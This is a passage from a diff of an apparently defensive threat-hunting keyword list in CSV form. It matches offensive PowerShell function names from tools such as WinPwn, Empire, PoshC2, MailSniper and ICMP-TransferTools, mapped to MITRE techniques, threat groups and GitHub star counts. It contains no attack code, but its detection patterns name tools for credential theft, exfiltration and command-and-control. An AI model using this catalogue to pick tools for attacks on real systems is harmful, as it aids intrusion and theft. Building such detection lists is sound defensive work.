Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-HandleKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-HandleKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Handlekatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-HardenedUNCPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-GPPPasswordCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Grouper2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Grouper2*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Grouper3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Grouper3*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-HandleKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-HandleKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Handlekatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-HardenedUNCPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-HijackableDllsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-HijackableDllsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-HijackableDllsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-HoneypotBuster*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","1","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Invoke-HostEnum -*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" -"*invoke-hostenum -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-hostenum -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-HostEnum*","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*Invoke-HostRecon*","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","401","114","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" -"*invoke-hostscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-HotFixVulnCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*invoke-hostscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-HotFixVulnCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-IcmpDownload*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-IcmpDownload.ps1*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-IcmpUpload.ps1*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" -"*Invoke-ImpersonateUser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-InjectGEvent*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-InjectGEventAPI*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-InstalledProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ImpersonateUser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-InjectGEvent*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-InjectGEventAPI*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-InstalledProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-InstalledServicesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-InstalledServicesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Interceptor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-Internalmonologue*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Internalmonologue*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Inveigh*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-InstalledServicesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Interceptor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Internalmonologue*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Internalmonologue*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Inveigh*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*Invoke-Inveigh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-InveighRelay*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-InveighRelay.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Inveigh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 